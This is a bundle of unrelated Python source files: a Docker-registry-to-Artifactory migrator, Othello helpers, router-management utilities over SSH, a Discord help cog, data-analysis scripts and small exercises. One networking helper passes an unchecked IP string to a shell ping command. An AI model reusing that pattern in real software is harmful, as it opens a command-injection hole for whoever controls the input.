migrations.RunPython(create_settings, backward) ] import argparse import logging import sys import Queue from migrator.Migrator import Migrator from migrator.ArtifactoryDockerAccess import ArtifactoryDockerAccess from migrator.DockerRegistryAccess import DockerRegistryAccess from migrator.QuayAccess import QuayAccess from migrator.DTRAccess import DTRAccess import os import shutil dir_path = os.path.dirname(os.path.realpath(__file__)) ''' Entry point and argument parser for Docker to Artifactory migrator Supports: generic - Migrate from a generic, token based registry. ecr - Migrate from an Amazon Elastic Container Registry quay - Migrate from a SaaS Quay registry. quayee - Migrate from Quay Enterprise. ''' # Globals NUM_OF_WORKERS = 2 MIN_NUM_OF_WORKERS = 1 MAX_NUM_OF_WORKERS = 16 def add_extra_args(parser): parser.add_argument('--ignore-certs', dest='ignore_cert', action='store_const', const=True, default=False, help='Ignore any certificate errors from both source and destination') parser.add_argument('--overwrite', action='store_true', help='Overwrite existing image/tag on the destination') parser.add_argument('--num-of-workers', dest='workers', type=int, default=NUM_OF_WORKERS, help='Number of worker threads. Defaults to %d.' % NUM_OF_WORKERS) parser.add_argument('-v', '--verbose', action='store_true', help='Make the operation more talkative') # Provide a predefined set of images to import parser.add_argument('--image-file', dest='image_file', help='Limit the import to a set of images in the provided file. ' 'Format of new line separated file: \'<image-name>:<tag>\' OR ' '\'<image-name>\' to import all tags of that repository.') def add_art_access(parser): art_group = parser.add_argument_group('artifactory') art_group.add_argument('artifactory', help='The destination Artifactory URL') art_group.add_argument('username', help='The username to use for authentication to Artifactory') art_group.add_argument('password', help='The password to use for authentication to Artifactory') art_group.add_argument('repo', help='The docker repository in Artifactory to store the images') # Sets up the argument parser for the application def get_arg_parser(): parser = argparse.ArgumentParser(prog='python DockerMigrator.py', description='Docker registry to Artifactory migrator.') # Generic Registry Parser subparsers = parser.add_subparsers(help='sub-command help') parser_generic = subparsers.add_parser('generic', help='A generic tool to migrate a single registry') # Source registry access source_group = parser_generic.add_argument_group('source') source_group.add_argument('source', help='The source registry URL') source_group.add_argument('--source-username', help='The username to use for authentication to the source') source_group.add_argument('--source-password', help='The password to use for authentication to the source') # Artifactory access add_art_access(parser_generic) # Extra options add_extra_args(parser_generic) parser_generic.set_defaults(func=generic_migration) # ECR parser_ecr = subparsers.add_parser('ecr', help='A tool to migrate from Amazon Elastic Container Registry (ECR)') # Source registry access source_group = parser_ecr.add_argument_group('source') source_group.add_argument('source', help='The source registry URL') source_group.add_argument('token', help='The token generated by the aws tool') # Artifactory access add_art_access(parser_ecr) # Extra options add_extra_args(parser_ecr) parser_ecr.set_defaults(func=ecr_migration) # DTR parser_dtr = subparsers.add_parser('dtr', help='A tool to migrate from Docker Trusted Registry (DTR)') # Source registry access source_group = parser_dtr.add_argument_group('source') source_group.add_argument('source', help='The DTR registry URL') source_group.add_argument('dtr_username', help='The username of a DTR admin') source_group.add_argument('dtr_password', help='The DTR admin password or token') # Artifactory access add_art_access(parser_dtr) # Extra options add_extra_args(parser_dtr) parser_dtr.set_defaults(func=dtr_migration) # GCR parser_gcr = subparsers.add_parser('gcr', help='A tool to migrate from Google Container Registry (GCR)') # Source registry access source_group = parser_gcr.add_argument_group('source') source_group.add_argument('--source', help='The source registry URL (defaults to https://gcr.io)', default='https://gcr.io') source_group.add_argument('keyfile', help='The Google JSON key file') # Artifactory access add_art_access(parser_gcr) # Extra options add_extra_args(parser_gcr) parser_gcr.set_defaults(func=gcr_migration) # QUAY parser_quay = subparsers.add_parser('quay', help='A tool specifically for Quay SaaS') quay = parser_quay.add_argument_group('source') quay.add_argument('namespace', help='The username or organization to import repositories from') quay.add_argument('token', help='The OAuth2 Access Token') # Artifactory access add_art_access(parser_quay) # Extra options add_extra_args(parser_quay) parser_quay.set_defaults(func=quay_migration) # Quay enterprise parser_quay_ee = subparsers.add_parser('quayee', help='A tool specifically for Quay Enterprise') quay_ee = parser_quay_ee.add_argument_group('source') quay_ee.add_argument('source', help='The source registry URL') quay_ee.add_argument('--source-username', help='The super user username') quay_ee.add_argument('--source-password', help='The super user password') quay_ee.add_argument('--token', help='The OAuth2 Access Token') # Artifactory access add_art_access(parser_quay_ee) # Extra options add_extra_args(parser_quay_ee) parser_quay_ee.set_defaults(func=quay_ee_migration) return parser ''' Parse image file Returns two different lists, one with just image names and one with image/tag tuple. Example: Input file: image_name1 image_name2, image_name3:tag1 image_name4:tag2 Result: [image_name1, image_name2,...], [(image_name3, tag1), (image_name4, tag2),...] ''' def parse_image_file(file_path): image_names = [] images = [] try: with open(file_path) as f: content = f.readlines() for unprocessed_line in content: line = unprocessed_line.strip() if ':' in line: name, tag = line.split(':') if name and tag: images.append((name, tag)) elif len(line) > 0: image_names.append(line) return image_names, images except Exception as ex: logging.error("Unable to read in image file '%s' due to %s" % (file_path, str(ex))) return [], [] def parse_key_file(file_path): try: with open(file_path) as f: content = f.read() return content except Exception as ex: logging.error("Unable to read in key file '%s' due to %s" % (file_path, str(ex))) return None ''' Generic migration for a V2 token based Docker registry @param args - The user provided arguments @param work_dir - The temporary work directory @registry - The source registry (for info only) ''' def generic_migration(args, work_dir, registry="generic"): # Verify the more intricate argument requirements if bool(args.source_username) != bool(args.source_password): parser.error("--source-username and --source-password must both be provided or neither.") if args.workers < MIN_NUM_OF_WORKERS or args.workers > MAX_NUM_OF_WORKERS: parser.error("--num-of-workers must be between %d and %d." % (MIN_NUM_OF_WORKERS, MAX_NUM_OF_WORKERS)) # Set up and verify the connection to the source registry source = DockerRegistryAccess(url=args.source, username=args.source_username, password=args.source_password, ignore_cert=args.ignore_cert) common_migration(args, work_dir, source, registry) ''' ECR migration @param args - The user provided arguments @param work_dir - The temporary work directory ''' def ecr_migration(args, work_dir): if args.workers < MIN_NUM_OF_WORKERS or args.workers > MAX_NUM_OF_WORKERS: parser.error("--num-of-workers must be between %d and %d." % (MIN_NUM_OF_WORKERS, MAX_NUM_OF_WORKERS)) # Set up and verify the connection to the source registry source = DockerRegistryAccess(url=args.source, username='AWS', password=args.token, method='basic', ignore_cert=args.ignore_cert) common_migration(args, work_dir, source, "ecr") ''' GCR migration @param args - The user provided arguments @param work_dir - The temporary work directory ''' def gcr_migration(args, work_dir): if args.workers < MIN_NUM_OF_WORKERS or args.workers > MAX_NUM_OF_WORKERS: parser.error("--num-of-workers must be between %d and %d." % (MIN_NUM_OF_WORKERS, MAX_NUM_OF_WORKERS)) password = parse_key_file(args.keyfile) if not password: sys.exit("Unable to read key file or key is empty.") # Set up and verify the connection to the source registry source = DockerRegistryAccess(url=args.source, username='_json_key', password=password, method='basic', ignore_cert=args.ignore_cert) common_migration(args, work_dir, source, "gcr") ''' DTR migration @param args - The user provided arguments @param work_dir - The temporary work directory ''' def dtr_migration(args, work_dir): if args.workers < MIN_NUM_OF_WORKERS or args.workers > MAX_NUM_OF_WORKERS: parser.error("--num-of-workers must be between %d and %d." % (MIN_NUM_OF_WORKERS, MAX_NUM_OF_WORKERS)) # Set up and verify the connection to the source registry source = DTRAccess(url=args.source, username=args.dtr_username, password=args.dtr_password, ignore_cert=args.ignore_cert) common_migration(args, work_dir, source, "ecr") ''' Common migration procedure @param args - The user provided arguments @param work_dir - The temporary work directory @param source - The source access @registry - The source registry (for info only) ''' def common_migration(args, work_dir, source, registry="NA"): if not source.verify_is_v2(): sys.exit("The provided URL does not appear to be a valid V2 repository.") # Set up and verify the connection to Artifactory art_access = setup_art_access(args.artifactory, args.username, args.password, args.repo, args.ignore_cert) image_names = [] q = Queue.Queue() # Build the list of image/tags # If the user provides a set of images, don't query the upstream if 'image_file' in args and args.image_file: image_names, images = parse_image_file(args.image_file) for image_name, tag in images: q.put_nowait((image_name, tag)) else: logging.info("Requesting catalog from source registry.") image_names = source.get_catalog() if not image_names: print "Found no repositories." if image_names: print "Found %d repositories." % len(image_names) populate_tags(image_names, source, q) if not q.empty(): # Perform the migration perform_migration(source, art_access, q, work_dir, registry) else: print "Nothing to migrate." ''' Set up and verify the connection to Artifactory @param artifactory_url - The URL to the Artifactory instance @param username - The username to access Artifactory @param password - The password (API Key, encrypted password, token) to access Artifactory @param repo - The repo name @param ignore_cert - True if the certificate to this instance should be ignored ''' def setup_art_access(artifactory_url, username, password, repo, ignore_cert): art_access = ArtifactoryDockerAccess(url=artifactory_url, username=username, password=password, repo=repo, ignore_cert=ignore_cert) if not art_access.is_valid(): sys.exit("The provided Artifactory URL or credentials do not appear valid.") if not art_access.is_valid_version(): sys.exit("The provided Artifactory instance is version %s but only 4.4.3+ is supported." % art_access.get_version()) if not art_access.is_valid_docker_repo(): sys.exit("The repo %s does not appear to be a valid V2 Docker repository." % args.repo) return art_access ''' Finds and populates the tags for a set of image names @param image_names - A list of images names @param source - Access to the source registry @param q - The queue to populate with (image_name, tag) tuples ''' def populate_tags(image_names, source, q): print "Populating set of image/tags..." for image_name in image_names: image_name = str(image_name) tags = source.get_tags(image_name) if tags: print "Found %d tags for repository %s." % (len(tags), image_name) for tag in tags: tag = str(tag) q.put_nowait((image_name, tag)) ''' Perform the migration @param source - Access to the source registry @param art_access - Access to the Artifactory destination @param q - The queue of (image, tag) tuples that have to be migrated @param work_dir - The temporary working directory @registry - The source registry (for info only) ''' def perform_migration(source, art_access, q, work_dir, registry="NA"): print "Performing migration for %d image/tags." % q.qsize() art_access.report_usage(registry) m = Migrator(source, art_access, q, args.workers, args.overwrite, work_dir) m.migrate() print "Migration finished." # Report any skipped images skipped_list = list(m.get_skipped_queue().queue) skipped_count = len(skipped_list) if skipped_list and skipped_count > 0: print "Skipped %d images because they already exist in Artifactory." % skipped_count # Report on any failures failure_list = list(m.get_failure_queue().queue) failure_count = len(failure_list) if failure_list and failure_count > 0: print "Failed to migrate the following %d images: " % failure_count for image, tag in failure_list: print " %s/%s" % (image, tag) def quay_migration(args, work_dir): # Set up and verify the connection to Artifactory art_access = setup_art_access(args.artifactory, args.username, args.password, args.repo, args.ignore_cert) q = Queue.Queue() # If the user provides a set of images, don't query the upstream if 'image_file' in args and args.image_file: image_names, images = parse_image_file(args.image_file) for image_name, tag in images: q.put_nowait((image_name, tag)) else: quay = QuayAccess(args.namespace, args.token) image_names = quay.get_catalog() if not image_names: logging.error("Failed to retrieve catalog.") # Set up the token based connection to Quay source = DockerRegistryAccess(url="https://quay.io", username="$oauthtoken", password=args.token, ignore_cert=args.ignore_cert) if image_names: print "Found %d repositories." % len(image_names) populate_tags(image_names, source, q) if not q.empty(): # Perform the migration perform_migration(source, art_access, q, work_dir, "quay") else: print "Nothing to migrate." def quay_ee_migration(args, work_dir): # Verify arguments if bool(args.source_username) != bool(args.source_password): parser.error("--source-username and --source-password must both be provided or neither.") if bool(args.token) and bool(args.source_username): parser.error("The token and source username/password arguments are mutually exclusive.") if not(bool(args.token) or bool(args.source_username)): parser.error("The token or source username/password arguments must be specified.") if bool(args.token): # Transform the token into username/password args.source_username = "$oauthtoken" args.source_password = args.token generic_migration(args, work_dir, "quayee") def setup_logging(level): fmt = "%(asctime)s [%(threadName)s] [%(levelname)s]" fmt += " (%(name)s:%(lineno)d) - %(message)s" formatter = logging.Formatter(fmt) stdouth = logging.StreamHandler(sys.stdout) stdouth.setFormatter(formatter) logger = logging.getLogger() logger.setLevel(level) logger.handlers = [] logger.addHandler(stdouth) if __name__ == '__main__': # Argument parsing logging.info("Parsing and verifying user provided arguments.") parser = get_arg_parser() args = parser.parse_args() # Set log level if args.verbose: setup_logging(logging.INFO) else: setup_logging(logging.WARN) # Create temp dir work_dir = os.path.join(dir_path, 'workdir') if not os.path.exists(work_dir): try: os.makedirs(work_dir) except: sys.exit("Failed to create work directory '%s'" % work_dir) # Calls the appropriate function based on user's selected operation args.func(args, work_dir) # Delete temp dir if os.path.exists(work_dir): shutil.rmtree(work_dir, ignore_errors=True) # Compatibility layer for Python 2.6: try loading unittest2 import sys if sys.version_info[:2] == (2, 6): try: import unittest2 as unittest except ImportError: raise Exception('The test suite requires unittest2 on Python 2.6') else: import unittest <filename>utils.py import time import copy N = 8 DIR = [1,-1,8,-8,9,-9,7,-7] dirx = [-1, 0, 1, -1, 1, -1, 0, 1] diry = [-1, -1, -1, 0, 0, 1, 1, 1] def opponent(player): return 1 if player is 2 else 2 def move(x, y, player, board): totctr = 0 # total number of opponent pieces taken board[N*y + x] = player for d in range(8): # 8 directions ctr = 0 for i in range(N): dx = x + dirx[d] * (i + 1) dy = y + diry[d] * (i + 1) if dx < 0 or dx > N - 1 or dy < 0 or dy > N - 1: ctr = 0; break elif board[dy*N + dx] == player: break elif board[dy*N + dx] == 0: ctr = 0; break else: ctr += 1 for i in range(ctr): dx = x + dirx[d] * (i + 1) dy = y + diry[d] * (i + 1) board[dy*N + dx] = player totctr += ctr return (board, totctr) # Que movimientos podemos hacer? def get_moves(board, player): validMoves = [] for i, piece in enumerate(board): if not piece: (tmp_board, tot) = move(i%N, int(i/N), player, copy.deepcopy(board)) """ for movement in DIR: valid = False d = i + movement row = int(d/N) col = d%N if row < 0 or row > N - 1 or col < 0 or col > N - 1 or d < 0: continue elif board[d] == player: continue elif board[d] == 0: continue else: valid = True valid and i not in validMoves and validMoves.append(i) """ tot and i not in validMoves and validMoves.append(i) return validMoves # Aplicar movimoento a un board def make_move(move, player, board): board[move] = player for d in DIR: make_flips(move, player, board, d) return board def make_flips(move, player, board, direction): bracket = find_bracket(move, player, board, direction) if not bracket: return square = move + direction while square != bracket: board[square] = player square += direction def find_bracket(square, player, board, direction): bracket = square + direction row = int(bracket/N) col = bracket%N if row < 0 or row > N - 1 or col < 0 or col > N - 1 or bracket < 0 or bracket > 63: return None if board[bracket] == player: return None opp = opponent(player) while board[bracket] == opp: bracket += direction row = int(bracket/N) col = bracket%N if row < 0 or row > N - 1 or col < 0 or col > N - 1 or bracket < 0: return None return bracket # Heuristica a utilizar (esquinas valen mas aparentemente?) def score(board, player): tot = 0 for i, piece in enumerate(board): if piece == player: row = int(i/N) col = i%N if (row == 0 or row == N - 1) and (col == 0 or col == N - 1): tot += 4 # corner elif (row == 0 or row == N- 1) or (col == 0 or col == N - 1): tot += 2 # side else: tot += 1 return tot def lastMove(board, player): return not len(get_moves(board, player)) import subprocess import socket import struct import re from pexpect import pxssh from networking import configuration, shared def get_default_gateway(): with open("/proc/net/route") as f: for line in f: fields = line.strip().split() if fields[1] != "00000000" or not int(fields[3], 16) & 2: continue return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16))) def ping(ip): try: subprocess.check_output("ping -c 2 -q " + ip, shell=True) except Exception: return False return True def clear_output(before): return before.decode("UTF-8").replace("\r", "").split("\n") def get_hostname(before): return clear_output(before)[-1] def check_conn(session, ip): configuration.send_commands(session, ["ping " + ip + " r 3"]) output = clear_output(session.before)[-2] percentage = output.split()[3] return 0 < int(percentage) def aton(ip): return struct.unpack("!L", socket.inet_aton(ip))[0] def ntoa(ip): return socket.inet_ntoa(struct.pack("!L", ip)) def net_from_ip_mask(ip, mask): return ntoa(aton(ip) & aton(mask)) def get_wildcard(mask): return ntoa(0xFFFFFFFF & ~aton(mask)) def get_broadcast(network, mask): net = aton(net_from_ip_mask(network, mask)) wildcard = aton(get_wildcard(mask)) return ntoa(net + wildcard) def check_range_from_network(ip_add, network, mask): net = aton(network) broadcast = aton(get_broadcast(network, mask)) ip = aton(ip_add) return ip > net and ip < broadcast def get_connections(session): configuration.send_commands(session, ["sh run | inc interface | ip address | shu"]) lines = clear_output(session.before) lines.pop(0) lines.pop() table = [] interface = {} active = False for line in lines: fields = line.strip().split() if fields[0] == "interface": if active: table.append(interface) interface = {} active = True interface["name"] = fields[1] elif fields[0] == "ip": interface["ip"] = fields[2] interface["net"] = net_from_ip_mask(fields[2], fields[3]) interface["mask"] = fields[3] elif fields[0] == "shutdown": active = False return table def get_all_connections(session): configuration.send_commands(session, ["sh run | inc interface | ip address | shu"]) lines = clear_output(session.before) lines.pop(0) lines.pop() table = [] interface = None for line in lines: fields = line.strip().split() if fields[0] == "interface": if interface is not None: table.append(interface) interface = { "name": translate_to_flask(fields[1]), "ip": "unassigned", "mask": "unassigned", "net": "unassigned", "is_active": True, } elif fields[0] == "ip": interface["ip"] = fields[2] interface["net"] = net_from_ip_mask(fields[2], fields[3]) interface["mask"] = fields[3] elif fields[0] == "shutdown": interface["is_active"] = False table.append(interface) return table def get_next_hop(fields): ip = aton(fields["ip"]) net = aton(fields["net"]) if net + 1 == ip: return ntoa(ip + 1) else: return ntoa(ip - 1) def get_next_hops(session, connections): hops = [] for conn in connections: hop = get_next_hop(conn) hops.append({"source": conn["ip"], "hop": hop, "mask": conn["mask"]}) return hops def login(ip): session = pxssh.pxssh() session.login(ip, shared.username, shared.password, auto_prompt_reset=False) session.sendline("term length 0") session.expect("#") shared.hostname = get_hostname(session.before) return session def get_users(session): configuration.send_commands(session, ["sh run | i user"]) lines = clear_output(session.before) lines.pop(0) lines.pop() users = [] for line in lines: fields = line.strip().split() if fields[0] == "username": users.append(fields[1]) return users def check_user(session, user): users = get_users(session) return user in users def get_information(session): configuration.send_commands( session, ["show version | include Software | processor"] ) lines = clear_output(session.before) lines.pop(0) lines.pop() return {"os": lines[0].split()[7], "brand": lines[1]} def check_interface(session, interface): connections = get_all_connections(session) for conn in connections: if translate_to_router(conn["name"]) == interface: return conn return None def get_all_interfaces(session): configuration.send_commands(session, ["sh ip int br"]) lines = clear_output(session.before) lines.pop(0) lines.pop() interfaces = [] for line in lines: fields = line.strip().split() if fields[0] != "Interface": interfaces.append(fields[0]) return interfaces def translate_to_flask(interface_name): return interface_name.replace("/", "-") def translate_to_router(interface_name): return interface_name.replace("-", "/") def validate_ip(ip): pattern = re.compile( "^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$" ) return pattern.search(ip) def get_prefix(mask): wildcard = aton(get_wildcard(mask)) counter = 0 while wildcard != 0: counter += 1 wildcard >>= 1 return 32 - counter from tca import *<reponame>CHChang810716/LanYunERP<filename>backend/setup/lanyunerpbe/apps.py from django.apps import AppConfig class LanyunerpbeConfig(AppConfig): default_auto_field = 'django.db.models.BigAutoField' name = 'lanyunerpbe' from giraphics.graphing.figure import * def func(x): return math.exp(x-math.sin(x)) f = Figure(600, 450, 15, 10, "fig.svg", origin=[-5,-5]) f.grid() f.plot(func, colour="red") # f.grid2(colour="blue") f.ticks(markers=True) f.xlabel(label="f(x)") f.ylabel() f.title("Title") f.save() f.display()#Aula 114 #Desafio: ''' '''<reponame>beckernick/cml_rapids<filename>testing.py import cudf ## Simple hello world script to verify that everything is working train_path = "data/application_train.csv" tips_df = cudf.read_csv(train_path) print("the dataframe is shaped: {0}".format(tips_df.shape))<reponame>yiyinghsieh/python-algorithms-data-structures<gh_stars>0 """Codewars: Easy Line 7 kyu URL: https://www.codewars.com/kata/56e7d40129035aed6c000632/train/python In the drawing below we have a part of the Pascal's triangle, lines are numbered from zero (top). [ [1], [1, 1], [1, 2, 1], [1, 3, 3, 1], [1, 4, 6, 4, 1], ... ] We want to calculate the sum of the squares of the binomial coefficients on a given line with a function called easyline (or easyLine or easy-line). Can you write a program which calculate easyline(n) where n is the line number? The function will take n (with: n>= 0) as parameter and will return the sum of the squares of the binomial coefficients on line n. ##Examples: easyline(0) => 1 easyline(1) => 2 easyline(4) => 70 easyline(50) => 100891344545564193334812497256 ##Ref: http://mathworld.wolfram.com/BinomialCoefficient.html """ def easyline1(n): if n <= 1: return sum([1] * (n + 1)) # Create "raw" Pascal's triangle T = [] for i in range(n + 1): T.append([1] * (i + 1)) # Iterate through rows to update middle numbers. for i in range(2, n + 1): for j in range(1, len(T[i]) - 2 + 1): T[i][j] = T[i-1][j-1] + T[i-1][j] # Take the last to compute sum of squares. squared_sum = 0 for num in T[-1]: squared_sum += num**2 return squared_sum def easyline2(n): if n <= 1: return sum([1] * (n + 1)) T = [] for i in range(n + 1): T.append([1] * (i + 1)) for j in range(1, len(T[i]) - 2 + 1): T[i][j] = T[i - 1][j - 1] + T[i - 1][j] squared_sum = 0 for num in T[-1]: squared_sum += num **2 return squared_sum def easyline3(n): if n <= 1: return sum([1] * (n + 1)) # 1st prev_row for the 2nd row. prev_row = [1, 1] # Whiteboard debugging: # i = 3 # prev_row = [1, 2, 1] # row = [1, 3, 3, 1] # len(row) = 4 # j in 1 ~ 2 # j = 1: row[1] = prev_row[0] + prev_row[1] = 1 + 2 = 3 # j = 2: row[2] = prev_row[1] + prev_row[2] = 2 + 1 = 3 for i in range(2, n + 1): row = [1] * (i + 1) for j in range(1, len(row) - 2 + 1): row[j] = prev_row[j - 1] + prev_row[j] prev_row = row squared_sum = sum([num ** 2 for num in row]) return squared_sum def main(): # Output: 1 n = 0 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) # Output: 2 n = 1 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) # Output: 6 n = 2 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) # Output: 20 n = 3 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) # Output: 70 n = 4 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) # Output: 252 n = 5 print(easyline1(n)) print(easyline2(n)) print(easyline3(n)) if __name__ == '__main__': main() <filename>src/python/main.py import os import multiprocessing import cPickle as pickle import worker TMPDIR = "/tmp/" WORKERS = 60 total_tasks = 0 def retrieve_tasks(dataset_id): if dataset_id == 11: bucket = "zfish" elif dataset_id == 1: bucket = "e2198_compressed" with open("{}{}.tasks".format(TMPDIR, bucket), "rb") as f: return bucket, pickle.load(f) def worker_main(queue): global proc_tasks while True: task = queue.get(True) if task is None: queue.put(None) # Put it back for other running workers return else: print("Processing task {}/{}".format(task["id"], total_tasks)) os.sys.stdout.flush() worker.calcSpawnTable(task["bucket"], task["pre"], task["post"]) def main(): global total_tasks # Get Worker Tasks print("Loading tasks...") os.sys.stdout.flush() bucket, tasks = retrieve_tasks(11) total_tasks = len(tasks) print("Done. Found {} tasks".format(total_tasks)) os.sys.stdout.flush() # Create Queue and Pool queue = multiprocessing.Queue() pool = multiprocessing.Pool(WORKERS, worker_main, (queue,)) task_cnt = 0 for center_path, neighbor_path in tasks: params = { "id": task_cnt, "bucket": bucket, "pre": center_path, "post": neighbor_path } queue.put(params) task_cnt += 1 # Add poison pill to shutdown workers queue.put(None) # Clean up pool.close() pool.join() if __name__ == '__main__': main() """ Copyright 2020 ETH Zurich, Secure, Reliable, and Intelligent Systems Lab Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import csv def get_tests(dataset): if (dataset == 'acasxu'): specfile = './acasxu/specs/acasxu_prop' + str(specnumber) + '_spec.txt' tests = open(specfile, 'r').read() else: csvfile = open('./{}_test.csv'.format(dataset), 'r') tests = csv.reader(csvfile, delimiter=',') return tests zonotope_file = open('./cifar10zt.zt', 'w+') epsilon = 0.026 tests = get_tests('cifar10') image_number = 0 for index, test in enumerate(tests): if index < image_number: continue test = test[1:] zonotope_file.write(str(len(test)) + ' ' + str(1+len(test))+'\n') for dim, a_0 in enumerate(test): current_epsilon = epsilon #normalize to [0, 1] normalized = int(a_0)/255.0 if normalized < epsilon: current_epsilon = (epsilon + normalized)/2 normalized = current_epsilon elif normalized > (1 - epsilon): current_epsilon = (epsilon + (1-normalized))/2 normalized = 1 - current_epsilon zonotope_file.write(str(normalized) + ' ') for i in range(len(test)): if i == dim: zonotope_file.write(str(current_epsilon) + ' ') else: zonotope_file.write('0 ') zonotope_file.write('\n') break zonotope_file.close()import discord from discord.ext import commands from Constants import SUB_COMMANDS_TEXT, SUB_SUB_COMMANDS_TEXT class Help(commands.Cog): def __init__(self, client): self.client = client self.SUB_COMMANDS = [i.lower() for i in SUB_COMMANDS_TEXT] self.SUB_SUB_COMMANDS = [i.lower() for i in SUB_SUB_COMMANDS_TEXT] self.SUB_COMMANDS_EMBEDS = {} self.SUB_SUB_COMMANDS_EMBEDS = {} self.create_main_help_embed() self.create_sub_help_embeds() self.create_sub_sub_help_embeds() @commands.command() async def help(self, ctx, term=None): '''Main help command''' if term == None: _temp_embed = self.main_help_embed await ctx.send(embed=_temp_embed.set_footer(text=f"ordered by {ctx.author}", icon_url=ctx.author.avatar_url)) elif term.lower() in self.SUB_COMMANDS: _temp_embed = self.SUB_COMMANDS_EMBEDS[term.lower()] await ctx.send(embed=_temp_embed.set_footer(text=f"ordered by {ctx.author}", icon_url=ctx.author.avatar_url)) elif term.lower() in self.SUB_SUB_COMMANDS: _temp_embed = self.SUB_SUB_COMMANDS_EMBEDS[term.lower()] await ctx.send(embed=_temp_embed.set_footer(text=f"ordered by {ctx.author}", icon_url=ctx.author.avatar_url)) else: await ctx.send(f"No Sub Command such as `{term}` was found.") def create_main_help_embed(self): '''This function will Create the main help embeds in the starting''' self.main_help_embed = discord.Embed(title="**__Bhendi Bot 3__**", color=discord.Colour.blue()) self.main_help_embed.add_field(name="**Fun**", value="Simple and Fun Commands", inline=False) self.main_help_embed.add_field(name="**Moderation**", value="Commands for Mods", inline=False) self.main_help_embed.add_field(name="**Utility**", value="Utility commands", inline=False) def create_sub_help_embeds(self): '''This function will create the sub command help embeds in the starting''' for _sub_command in SUB_COMMANDS_TEXT: _embed = discord.Embed(title=f"**__{_sub_command}__**", color=discord.Colour.blue()) for _sub_sub_command in SUB_COMMANDS_TEXT[_sub_command]: _embed.add_field(name=f"**{_sub_sub_command}**", value=SUB_COMMANDS_TEXT[_sub_command][_sub_sub_command], inline=False) self.SUB_COMMANDS_EMBEDS[_sub_command.lower()] = _embed def create_sub_sub_help_embeds(self): '''This will create help embeds for each and ever command''' for _sub_sub_command in SUB_SUB_COMMANDS_TEXT: _embed = discord.Embed(title=f"**__{_sub_sub_command.title()}__**", color=discord.Colour.blue()) for _each_commands in SUB_SUB_COMMANDS_TEXT[_sub_sub_command]: _embed.add_field(name=f"**{_each_commands}**", value=SUB_SUB_COMMANDS_TEXT[_sub_sub_command][_each_commands], inline=False) self.SUB_SUB_COMMANDS_EMBEDS[_sub_sub_command.lower()] = _embed def setup(client): client.add_cog(Help(client)) import os,copy,argparse from collections import OrderedDict from pypospack.pyposmat.data import PyposmatDataFile from pypospack.pyposmat.data import PyposmatConfigurationFile from pypospack.pyposmat.data import PyposmatDataAnalyzer def str__qoi_constraints(qoi_constraints): s = [] for k,v in qoi_constraints.items(): if k == 'qoi_constraints': s.append(k) for qoic_n,qoic_v in v.items(): s.append("{:5} {:>20} {:^3} {:<10}".format("",qoic_n,qoic_v[0],qoic_v[1])) else: s.append(",".join([str(k),str(v)])) return "\n".join(s) def print__qoi_constraints(qoi_constraints): s = str__qoi_constraints(qoi_constraints) print(s) class Dev__PyposmatDataAnalyzer(PyposmatDataAnalyzer): def filter_with__qoi_constraints(self,kde_df,qoi_constraints): _df = copy.deepcopy(kde_df) for qn in self.datafile.qoi_names: aen = "{}.abserr".format(qn) en = "{}.err".format(qn) _df[aen] = _df[en].abs() for qoic_n,qoic_v in qoi_constraints.items(): nr0,nc0 =_df.shape if qoic_v[0] == '<': _df = _df[_df[qoic_n] < qoic_v[1]] elif qoic_v[0] == '>': _df = _df[_df[qoic_n] > qoic_v[1]] elif qoic_v[0] == '=': _df = _df[_df[qoic_n] == qoic_v[1]] else: raise ValueError('unknown operator, {}'.format(k)) nr1,nc0 =_df.shape s = "{:>20} {:^3} {:<10} {:10} {:10} {:10}".format(qoic_n,qoic_v[0],qoic_v[1],nr1,nr0,nr0-nr1) print(s) return _df def write_kde_file(self,filename): _qoi_constraints = self.configuration.qoi_constraints kde_df = copy.deepcopy(self._df) for k,v in _qoi_constraints.items(): if k == 'qoi_constraints': kde_df = self.filter_with__qoi_constraints(kde_df,v) kde_df = kde_df.reset_index(drop=True) elif k == 'filter_by_qoi_error': kde_df = self.filter_performance_requirements(kde_df,v) kde_df = kde_df.loc[kde_df['is_survive'] == 1] kde_df = kde_df.reset_index(drop=True) elif k == 'filter_by_phase_order': kde_df = self.filter_phase_order(kde_df,v) elif k == 'filter_by_pareto' or k == 'select_pareto_only': if v == True: kde_df = self.calculate_pareto_set(kde_df,v) kde_df = kde_df.loc[kde_df['is_pareto'] == 1] kde_df = kde_df.reset_index(drop=True) elif k == 'filter_by_dmetric': (nr,nc) = kde_df.shape kde_df = self.calculate_d_metric(kde_df) (nr,nc) = kde_df.shape if v[1] == 'pct': pct_to_keep = v[0]/100 n = int((nr * pct_to_keep) //1) else: n = min(v[0],nr) kde_df = kde_df.nsmallest(n,'d_metric') for en in self.error_names: print(en,kde_df[en].max()) (nr,nc) = kde_df.shape else: raise ValueError("unknown qoi_constraint method {}".format(k)) (nr,nc) = kde_df.shape print('after {}: {} remainings'.format(k,nr)) names = ['sim_id'] \ + self.parameter_names \ + self.qoi_names\ + self.error_names types = ['sim_id'] \ + len(self.parameter_names)*['param']\ + len(self.qoi_names)*['qoi']\ + len(self.error_names)*['err'] str_list = [] str_list.append(','.join(names)) str_list.append(','.join(types)) for i_row, row in kde_df[names].iterrows(): str_list.append(','.join([str(v) for v in row.values.tolist()])) with open(filename,'w') as f: f.write("\n".join(str_list)) if __name__ == "__main__": _fn_config=os.path.join("resources","pyposmat.config.in") _fn_data=os.path.join("resources","pyposmat.results.0a.out") _fn_pareto_out=os.path.join("pyposmat.pareto.out") _fn_kde_out=os.path.join("pyposmat.kde.out") pda = PyposmatDataAnalyzer( fn_config=_fn_config, fn_data=_fn_data) pda.write_kde_file(filename=_fn_kde_out) <reponame>KONAPAVANKUMAR/django-channels-group-chat import os from channels.routing import ProtocolTypeRouter,URLRouter from django.core.asgi import 